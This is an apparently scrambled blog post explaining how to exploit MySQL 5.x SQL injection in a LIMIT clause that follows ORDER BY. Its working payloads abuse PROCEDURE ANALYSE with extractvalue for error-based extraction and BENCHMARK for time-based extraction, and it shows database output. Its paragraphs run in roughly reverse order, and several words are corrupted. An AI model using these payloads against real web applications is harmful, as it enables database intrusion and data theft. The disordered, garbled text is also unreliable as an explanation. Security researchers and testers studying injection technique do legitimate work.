Update: It would be awesome if this technique is implemented in sqlmap.Queries using FETCH… OFFSET can still be non-deterministic if there is more than one row that has the same ordering value as the last row. Update: As BigBear pointed out in the comment, very similar solution was actually posted earlier on rdot. That’s why there must be a BENCHMARK instead. What is interesting that using SLEEP is not possible in this case. In this case, our solution will be as follows: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1) It turns out that we can combine the above method with another well-known technique – time based injection. What if our target doesn’t display errors? Are we still able to exploit it successfully? If, therefore, our vulnerable web application discloses the errors of the database engine (this is a real chance, such bad practices are common), we solve the problem. Voilà! The above solution is based on handy known technique of so-called error based injection. I didn’t give up so fast and I finally found the vector: mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1) ĮRROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' Therefore, sleep() is certainly not being called. Gives us immediate response: ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1) Let’s see whether the parameters of ANALYSE are evaluated. Let’s give it a try: mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1) ĮRROR 1386 (HY000): Can't use ORDER clause with this procedureĪNALYSE procedure can also take two parameters: mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1) ĭoes not bode us well. The only stored procedure available by default in MySQL is ANALYSE (see docs). It turns out that it is possible to solve our problem using PROCEDURE clause. This INTO clause is not interesting, unless the application uses a database account with permission to write files, which nowadays is rather rare situation in the wild. row_count ( row_count OFFSET offset ) ]Īfter the LIMIT clause may occur following clauses: PROCEDURE and INTO. So let’s look at the syntax of the SELECT in the MySQL 5 documentation SELECT The problem has appeared at stackoverflow and it was discussed at sla.ckers too. If ORDER BY was not there it would be actually very easy to exploit it simply using just UNION syntax. In MySQL we cannot use ORDER BY before UNION. Of course, important is the fact that the above query contains ORDER BY clause. It’s about a question if SQL injection vulnerability in the LIMIT clause in MySQL 5.x database is currently exploitable.Įxample query: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point When assessing the severity of SQL Injection in certain application, I encountered a problem, which I was not able to solve quickly using web search. This post is dedicated to a very specific situation. Countless number of articles was written on the exploitation of SQL Injections.
0 Comments
Leave a Reply. |